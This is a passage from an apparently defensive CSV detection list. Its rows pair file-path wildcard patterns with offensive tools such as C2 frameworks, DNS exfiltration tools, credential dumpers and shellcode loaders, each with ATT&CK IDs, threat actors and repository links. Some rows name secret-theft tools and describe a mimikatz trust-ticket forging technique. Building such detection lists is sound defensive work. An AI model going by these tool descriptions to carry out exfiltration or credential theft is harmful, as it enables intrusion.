Panda - Indrik Spider,C2,https://github.com/bitsadmin/nopowershell,1,1,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z -*/DLL-Hijack*,offensive_tool_keyword,cobaltstrike,DLL Hijack Search Order Enumeration BOF,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/DLL-Hijack-Search-Order-BOF,1,1,N/A,10,10,125,21,2021-11-03T17:39:32Z,2021-11-02T03:47:31Z -*/DllNotificationInjection.git*,offensive_tool_keyword,DllNotificationInjection,A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.,T1055.011 - T1055.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/ShorSec/DllNotificationInjection,1,1,N/A,10,4,319,56,2023-08-23T13:50:27Z,2023-08-14T11:22:30Z -*/DllProxy.git*,offensive_tool_keyword,DllProxy,Proxy your dll exports and add some spicy content at the same time,T1574.002 - T1036.005,TA0005 - TA0004,N/A,N/A,Exploitation Tools,https://github.com/Iansus/DllProxy/,1,1,N/A,N/A,1,16,5,2023-06-28T14:19:36Z,2021-05-04T19:38:42Z -*/dlls/c2.c*,offensive_tool_keyword,deimosc2,DeimosC2 is a Golang command and control framework for post-exploitation.,T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007,TA0011,N/A,N/A,C2,https://github.com/DeimosC2/DeimosC2,1,1,N/A,10,10,1004,158,2023-07-15T05:34:10Z,2020-06-30T19:24:13Z -*/dns_grabber.*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,1,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*/dns_spoof*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,1,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*/dns-blacklist.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/dns-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/dns-cache-snoop.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/dnscan.git*,offensive_tool_keyword,dnscan,dnscan is a python wordlist-based DNS subdomain scanner.,T1595 - T1595.002 - T1018 - T1046,TA0007 - TA0043,N/A,N/A,Reconnaissance,https://github.com/rbsec/dnscan,1,1,N/A,6,10,984,413,2022-08-09T11:11:31Z,2013-03-13T10:42:07Z -*/dnscan.py*,offensive_tool_keyword,dnscan,dnscan is a python wordlist-based DNS subdomain scanner.,T1595 - T1595.002 - T1018 - T1046,TA0007 - TA0043,N/A,N/A,Reconnaissance,https://github.com/rbsec/dnscan,1,1,N/A,6,10,984,413,2022-08-09T11:11:31Z,2013-03-13T10:42:07Z -*/dnscat.c*,offensive_tool_keyword,dnscat2,This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol,T1071.004 - T1102 - T1071.001,TA0002 - TA0003 - TA0008,N/A,N/A,C2,https://github.com/iagox86/dnscat2,1,1,N/A,10,10,3077,596,2023-04-26T17:40:22Z,2013-01-04T23:15:55Z -*/dnscat2.git*,offensive_tool_keyword,dnscat2,This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol,T1071.004 - T1102 - T1071.001,TA0002 - TA0003 - TA0008,N/A,N/A,C2,https://github.com/iagox86/dnscat2,1,1,N/A,10,10,3077,596,2023-04-26T17:40:22Z,2013-01-04T23:15:55Z -*/dns-check-zone.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/dns-client-subnet-scan.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/dnscnc.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*/DNSExfiltrator*,offensive_tool_keyword,DNSExfiltrator,DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.,T1041 - T1048,TA0010 - TA0011,N/A,N/A,Data Exfiltration,https://github.com/Arno0x/DNSExfiltrator,1,1,N/A,10,8,792,189,2019-10-06T22:24:55Z,2017-12-20T13:58:09Z -*/dns-fuzz.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/dns-ip6-arpa-scan.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/dns-nsec3-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/dns-nsec-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/dns-nsid.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/DNS-Persist/*,offensive_tool_keyword,DNS-Persist,DNS-Persist is a post-exploitation agent which uses DNS for command and control.,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/0x09AL/DNS-Persist,1,1,N/A,10,10,211,75,2017-11-20T08:53:25Z,2017-11-10T15:23:49Z -*/dns-random-srcport.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/dns-random-txid.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/dns-recursion.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/dns-service-discovery.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/dnsspoof.c*,offensive_tool_keyword,dsniff,password sniffer. handles FTP. Telnet. SMTP. HTTP. POP. poppass. NNTP. IMAP. SNMP. LDAP. Rlogin. RIP. OSPF. PPTP MS-CHAP. NFS. VRRP. YP/NIS. SOCKS. X11. CVS. IRC. AIM. ICQ. Napster. PostgreSQL. Meeting Maker. Citrix ICA. Symantec pcAnywhere. NAI Sniffer. Microsoft SMB. Oracle SQL*Net. Sybase and Microsoft SQL auth info. dsniff automatically detects and minimally parses each application protocol. only saving the interesting bits. and uses Berkeley DB as its output file format. only logging unique authentication attempts. full TCP/IP reassembly is provided by libnids(3) (likewise for the following tools as well).,T1110 - T1040 - T1074.001 - T1555.002 - T1555.003,TA0001 - TA0002 - TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/tecknicaltom/dsniff,1,0,N/A,N/A,2,167,44,2010-06-29T05:53:39Z,2010-06-23T13:11:11Z -*/dns-srv-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/dnsteal*,offensive_tool_keyword,dnsteal,This is a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests.,T1048.003 - T1568.002 - T1573.002,TA0010 - TA0002,N/A,N/A,Data Exfiltration,https://github.com/m57/dnsteal,1,1,N/A,N/A,10,1378,236,2022-02-03T11:04:49Z,2015-08-11T17:02:58Z -*/dnstool.py*,offensive_tool_keyword,krbrelayx,Kerberos unconstrained delegation abuse toolkit,T1558.003 - T1098,TA0004 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/dirkjanm/krbrelayx,1,1,N/A,N/A,2,900,148,2023-09-07T20:11:36Z,2019-01-08T18:42:07Z -*/dns-update.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/dns-zeustracker.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/dns-zone-transfer.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/dobin/avred*,offensive_tool_keyword,avred,Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.,T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/dobin/avred,1,1,N/A,9,2,172,19,2023-09-30T12:28:42Z,2022-05-19T12:12:34Z -*/docker-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/DocPlz.git*,offensive_tool_keyword,DocPlz,Documents Exfiltration and C2 project,T1105 - T1567 - T1071,TA0011 - TA0010 - TA0009,N/A,N/A,Data Exfiltration,https://github.com/TheD1rkMtr/DocPlz,1,1,N/A,10,1,48,6,2023-10-03T23:06:53Z,2023-10-02T20:49:22Z -*/DocsPLZ.cpp*,offensive_tool_keyword,DocPlz,Documents Exfiltration and C2 project,T1105 - T1567 - T1071,TA0011 - TA0010 - TA0009,N/A,N/A,Data Exfiltration,https://github.com/TheD1rkMtr/DocPlz,1,1,N/A,10,1,48,6,2023-10-03T23:06:53Z,2023-10-02T20:49:22Z -*/DocsPLZ.exe*,offensive_tool_keyword,DocPlz,Documents Exfiltration and C2 project,T1105 - T1567 - T1071,TA0011 - TA0010 - TA0009,N/A,N/A,Data Exfiltration,https://github.com/TheD1rkMtr/DocPlz,1,1,N/A,10,1,48,6,2023-10-03T23:06:53Z,2023-10-02T20:49:22Z -*/documentation-c2/*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/documentation-payload/*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/Doge-Loader/*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Shellcode Loader by Golang,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/timwhitez/Doge-Loader,1,1,N/A,10,10,277,61,2021-04-22T08:24:59Z,2020-10-09T04:47:54Z -*/DoHC2.cs*,offensive_tool_keyword,DoHC2,DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/SpiderLabs/DoHC2,1,1,N/A,10,10,432,99,2020-08-07T12:48:13Z,2018-10-23T19:40:23Z -*/DoHC2.git*,offensive_tool_keyword,DoHC2,DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/SpiderLabs/DoHC2,1,1,N/A,10,10,432,99,2020-08-07T12:48:13Z,2018-10-23T19:40:23Z -*/DoHC2/*,offensive_tool_keyword,DoHC2,DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/SpiderLabs/DoHC2,1,1,N/A,10,10,432,99,2020-08-07T12:48:13Z,2018-10-23T19:40:23Z -*/domain:* /sid:* /sids:* /rc4:* /user:* /service:krbtgt /target:*.kirbi*,offensive_tool_keyword,mimikatz,Mimikatz Using domain trust key From the DC dump the hash of the currentdomain\targetdomain$ trust account using Mimikatz (e.g. with LSADump or DCSync). Then using this trust key and the domain SIDs. forge an inter-realm TGT using Mimikatz adding the SID for the target domains enterprise admins group to our SID history.,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*/domain_analyzer.git*,offensive_tool_keyword,domain_analyzer,Analyze the security of any domain by finding all the information possible,T1560 - T1590 - T1200 - T1213 - T1057,TA0002 - TA0009,N/A,N/A,Information Gathering,https://github.com/eldraco/domain_analyzer,1,1,N/A,6,10,1831,259,2022-12-29T10:57:33Z,2017-08-08T18:52:34Z -*/domain_analyzer:latest*,offensive_tool_keyword,domain_analyzer,Analyze the security of any domain by finding all the information possible,T1560 - T1590 - T1200 - T1213 - T1057,TA0002 - TA0009,N/A,N/A,Information Gathering,https://github.com/eldraco/domain_analyzer,1,0,N/A,6,10,1831,259,2022-12-29T10:57:33Z,2017-08-08T18:52:34Z -*/domainhunter*,offensive_tool_keyword,domainhunter,Checks expired domains for categorization/reputation and Archive.org history to determine good candidates for phishing and C2 domain names ,T1583.002 - T1568.002,TA0011 - TA0009,N/A,N/A,Phishing,https://github.com/threatexpress/domainhunter,1,1,N/A,N/A,10,1380,291,2022-10-26T03:15:13Z,2017-03-01T11:16:26Z -*/DomainRecon/*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*/domcon-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/domcon-cmd.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/Dome.git*,offensive_tool_keyword,DOME,DOME - A subdomain enumeration tool,T1583 - T1595 - T1190,TA0011 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/v4d1/Dome,1,1,N/A,N/A,4,375,50,2022-03-10T12:08:17Z,2022-02-20T15:09:40Z -*/domino-enum-users.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/dompdf-rce*,offensive_tool_keyword,POC,This repository contains a vulnerable demo application using dompdf 1.2.0 and an exploit that achieves remote code execution via a ttf+php polyglot file.,T1203 - T1204,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation tools,https://github.com/positive-security/dompdf-rce,1,1,N/A,N/A,2,170,69,2022-03-17T18:05:07Z,2022-03-14T19:51:06Z -*/DonPAPI.git*,offensive_tool_keyword,donpapi,Dumping DPAPI credentials remotely,T1003.006 - T1021.001,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/login-securite/DonPAPI,1,1,N/A,N/A,8,731,94,2023-10-03T05:27:06Z,2021-09-27T09:12:51Z -*/DonPAPI.py*,offensive_tool_keyword,donpapi,Dumping DPAPI credentials remotely,T1003.006 - T1021.001,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/login-securite/DonPAPI,1,1,N/A,N/A,8,731,94,2023-10-03T05:27:06Z,2021-09-27T09:12:51Z -*/donut *.exe*,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,0,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z -*/donut.exe*,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,1,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z -*/donut.git,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,1,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z -*/Donut_Linux*,offensive_tool_keyword,HardHatC2,A C# Command & Control framework,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/DragoQCC/HardHatC2,1,1,N/A,10,10,825,133,2023-09-06T05:17:05Z,2022-12-08T19:40:47Z -*/Donut_Windows*,offensive_tool_keyword,HardHatC2,A C# Command & Control framework,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/DragoQCC/HardHatC2,1,1,N/A,10,10,825,133,2023-09-06T05:17:05Z,2022-12-08T19:40:47Z -*/DonutCS/Donut.cs*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*/donutmodule.c*,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,1,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z -*/DonutTest/*,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,1,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z -*/DotNet/SigFlip*,offensive_tool_keyword,cobaltstrike,SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - 